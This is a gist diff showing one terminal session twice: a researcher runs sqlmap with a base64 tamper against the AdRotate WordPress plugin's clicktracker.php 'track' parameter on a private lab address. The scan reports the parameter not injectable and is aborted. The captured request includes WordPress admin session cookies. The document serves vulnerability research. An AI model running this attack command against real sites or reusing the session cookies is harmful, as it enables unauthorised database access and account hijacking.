brandonprry · February 24, 2014 23:24
diff --git a/gistfile1.txt b/gistfile1.txt
 bperry@w00den-pickle:~/tools/sqlmap$ rm -rf output/
 bperry@w00den-pickle:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req --level=5 --risk=3 --technique=u --tamper=base64encode

    sqlmap/1.0-dev-58eac36 - automatic SQL injection and database takeover tool
    http://sqlmap.org

 [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

 [*] starting at 17:18:53

 [17:18:53] [INFO] parsing HTTP request from '/tmp/req.req'
 [17:18:53] [INFO] loading tamper script 'base64encode'
 [17:18:53] [INFO] testing connection to the target URL
 [17:18:53] [WARNING] heuristic (basic) test shows that GET parameter 'track' might not be injectable
 [17:18:53] [INFO] testing for SQL injection on GET parameter 'track'
 [17:18:53] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
 [17:19:07] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
 [17:19:24] [INFO] testing 'MySQL UNION query (NULL) - 11 to 20 columns'
 [17:19:36] [INFO] testing 'MySQL UNION query (random number) - 11 to 20 columns'
 [17:19:50] [INFO] testing 'MySQL UNION query (NULL) - 21 to 30 columns'
 [17:20:02] [INFO] testing 'MySQL UNION query (random number) - 21 to 30 columns'
 [17:20:15] [INFO] testing 'MySQL UNION query (NULL) - 31 to 40 columns'
 [17:20:28] [INFO] testing 'MySQL UNION query (random number) - 31 to 40 columns'
 [17:20:41] [INFO] testing 'MySQL UNION query (NULL) - 41 to 50 columns'
 [17:20:53] [INFO] testing 'MySQL UNION query (random number) - 41 to 50 columns'
 [17:21:08] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
 [17:21:08] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
 [17:21:22] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
 [17:21:39] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns'
 [17:21:51] [INFO] testing 'Generic UNION query (random number) - 11 to 20 columns'
 [17:22:04] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns'
 [17:22:16] [INFO] testing 'Generic UNION query (random number) - 21 to 30 columns'
 [17:22:30] [INFO] testing 'Generic UNION query (NULL) - 31 to 40 columns'
 [17:22:42] [INFO] testing 'Generic UNION query (random number) - 31 to 40 columns'
 [17:22:56] [INFO] testing 'Generic UNION query (NULL) - 41 to 50 columns'
 [17:23:08] [INFO] testing 'Generic UNION query (random number) - 41 to 50 columns'
 [17:23:23] [WARNING] GET parameter 'track' is not injectable
 [17:23:23] [WARNING] heuristic (basic) test shows that Host parameter 'Host' might not be injectable
 [17:23:23] [INFO] testing for SQL injection on Host parameter 'Host'
 [17:23:23] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
 [17:23:28] [WARNING] user aborted during detection phase
 how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit] 
 [17:23:28] [ERROR] user quit

 [*] shutting down at 17:23:28

 bperry@w00den-pickle:~/tools/sqlmap$ cat /tmp/req.req
 GET /wp-content/plugins/adrotate/library/clicktracker.php?track=1 HTTP/1.1
 Host: 192.168.1.63
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Proxy-Connection: keep-alive
 Cookie: wordpress_52a573d9067238f7979c3bcafbe4239b=admin%7C1393280555%7Cd752b418e630213197e8f5837d4c71f1; wordpress_logged_in_52a573d9067238f7979c3bcafbe4239b=admin%7C1393280555%7Cb4a95aeee47b440e2e31c5d963415eef; wordpress_test_cookie=WP+Cookie+check; wp-settings-time-1=1393107932
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_1) AppleWebKit/537.73.11 (KHTML, like Gecko) Version/7.0.1 Safari/537.73.11
 Accept-Language: en-us
 Accept-Encoding: gzip, deflate
 Connection: keep-alive

 bperry@w00den-pickle:~/tools/sqlmap$
	bperry@w00den-pickle:~/tools/sqlmap$ rm -rf output/
	bperry@w00den-pickle:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req --level=5 --risk=3 --technique=u --tamper=base64encode

	sqlmap/1.0-dev-58eac36 - automatic SQL injection and database takeover tool
	http://sqlmap.org

	[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

	[*] starting at 17:18:53

	[17:18:53] [INFO] parsing HTTP request from '/tmp/req.req'
	[17:18:53] [INFO] loading tamper script 'base64encode'
	[17:18:53] [INFO] testing connection to the target URL
	[17:18:53] [WARNING] heuristic (basic) test shows that GET parameter 'track' might not be injectable
	[17:18:53] [INFO] testing for SQL injection on GET parameter 'track'
	[17:18:53] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
	[17:19:07] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
	[17:19:24] [INFO] testing 'MySQL UNION query (NULL) - 11 to 20 columns'
	[17:19:36] [INFO] testing 'MySQL UNION query (random number) - 11 to 20 columns'
	[17:19:50] [INFO] testing 'MySQL UNION query (NULL) - 21 to 30 columns'
	[17:20:02] [INFO] testing 'MySQL UNION query (random number) - 21 to 30 columns'
	[17:20:15] [INFO] testing 'MySQL UNION query (NULL) - 31 to 40 columns'
	[17:20:28] [INFO] testing 'MySQL UNION query (random number) - 31 to 40 columns'
	[17:20:41] [INFO] testing 'MySQL UNION query (NULL) - 41 to 50 columns'
	[17:20:53] [INFO] testing 'MySQL UNION query (random number) - 41 to 50 columns'
	[17:21:08] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
	[17:21:08] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
	[17:21:22] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
	[17:21:39] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns'
	[17:21:51] [INFO] testing 'Generic UNION query (random number) - 11 to 20 columns'
	[17:22:04] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns'
	[17:22:16] [INFO] testing 'Generic UNION query (random number) - 21 to 30 columns'
	[17:22:30] [INFO] testing 'Generic UNION query (NULL) - 31 to 40 columns'
	[17:22:42] [INFO] testing 'Generic UNION query (random number) - 31 to 40 columns'
	[17:22:56] [INFO] testing 'Generic UNION query (NULL) - 41 to 50 columns'
	[17:23:08] [INFO] testing 'Generic UNION query (random number) - 41 to 50 columns'
	[17:23:23] [WARNING] GET parameter 'track' is not injectable
	[17:23:23] [WARNING] heuristic (basic) test shows that Host parameter 'Host' might not be injectable
	[17:23:23] [INFO] testing for SQL injection on Host parameter 'Host'
	[17:23:23] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
	[17:23:28] [WARNING] user aborted during detection phase
	how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]
	[17:23:28] [ERROR] user quit

	[*] shutting down at 17:23:28

	bperry@w00den-pickle:~/tools/sqlmap$ cat /tmp/req.req
	GET /wp-content/plugins/adrotate/library/clicktracker.php?track=1 HTTP/1.1
	Host: 192.168.1.63
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
	Proxy-Connection: keep-alive
	Cookie: wordpress_52a573d9067238f7979c3bcafbe4239b=admin%7C1393280555%7Cd752b418e630213197e8f5837d4c71f1; wordpress_logged_in_52a573d9067238f7979c3bcafbe4239b=admin%7C1393280555%7Cb4a95aeee47b440e2e31c5d963415eef; wordpress_test_cookie=WP+Cookie+check; wp-settings-time-1=1393107932
	User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_1) AppleWebKit/537.73.11 (KHTML, like Gecko) Version/7.0.1 Safari/537.73.11
	Accept-Language: en-us
	Accept-Encoding: gzip, deflate
	Connection: keep-alive

	bperry@w00den-pickle:~/tools/sqlmap$